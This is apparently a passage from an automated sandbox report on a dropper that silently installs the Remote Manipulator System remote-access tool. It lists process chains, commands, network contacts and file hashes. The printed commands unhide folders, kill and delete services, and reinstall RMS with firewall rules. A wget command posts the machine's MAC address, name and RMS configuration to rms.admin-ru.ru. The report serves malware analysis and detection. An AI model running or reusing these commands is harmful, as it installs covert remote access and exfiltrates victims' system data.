Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1272 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

C:\Users\Admin\AppData\Local\Temp\set.exe

"C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B6C9F1DBAA2924468E0E6E332A1BFC22

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=6E-24-64-90-26-A6&comp=VQVVOAJK&id=545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C084869646553746F70090C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773081550726F74656374496E6574496453657474696E6773080F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E080A496E7465726E657449640614532D39433132303046392D393138302D3431314311557365496E6574436F6E6E656374696F6E0913557365437573746F6D496E6574536572766572080A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E677308144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313735392E36383938343339353833084C6963656E73657306C2524D532D5A2D36414233383733313239626646373830303843323145666633453845434564616269593253326459586C52664477776E4932315756305A65586C39515643467866456457447778655241395749436732625674645555464457464E75596A39474267315A56673445416D5A2B61674145486C6C57446731554A6E4E6942785542424238434151466D456D49424167414243415548444830704A777745556C354744674141626D4977584577504442316256456B4E4A4431555677383D0D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223532313030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A1144697361626C65496E7465726E65744964080000&group=download" "http://rms.admin-ru.ru/updater.php" -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp
NL 104.110.191.133:80 tcp

Files

memory/1628-54-0x00000000751B1000-0x00000000751B3000-memory.dmp

\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\install.cmd

MD5 72b87d46624306c3e39acee8794c4dff
SHA1 6d5717c0b19f6b01419131eac2a713c5381e8156
SHA256 df42bf4d7de1d91d8d46bf5cac60395025650aa5107beb4a7d73f274c098aecb
SHA512 544ca3365d31fce1d50d7f380c0e67219c9b4146da258b76a91fa655aa4471bb3bfad7e0b257fff7e18abc7b1a4dfdcbc767915984c080a823a327c17a686fc7

memory/700-87-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\rms5.2.1.msi

MD5 2abaf6748b3b3a8aad84f715ae3bd3c1
SHA1 c03d62077019f114c317e6e78b5c3b0e8893cd0e
SHA256 c6e22f166038f6f2d131ade1861ace4fd83f0ce9dc46f5b5f0332ef918ef0164
SHA512 b4f563c9e5d2aac42fb088851c1e00de4cbf8c9506e2d09f86eaedb9cd103ad19a0ed50e3e4c1dee892eb25a37f5b2221c8c609ddd83d2fb3f51c5891cfdeec2

\Windows\Installer\MSI2DA5.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

C:\Windows\Installer\MSI2DA5.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
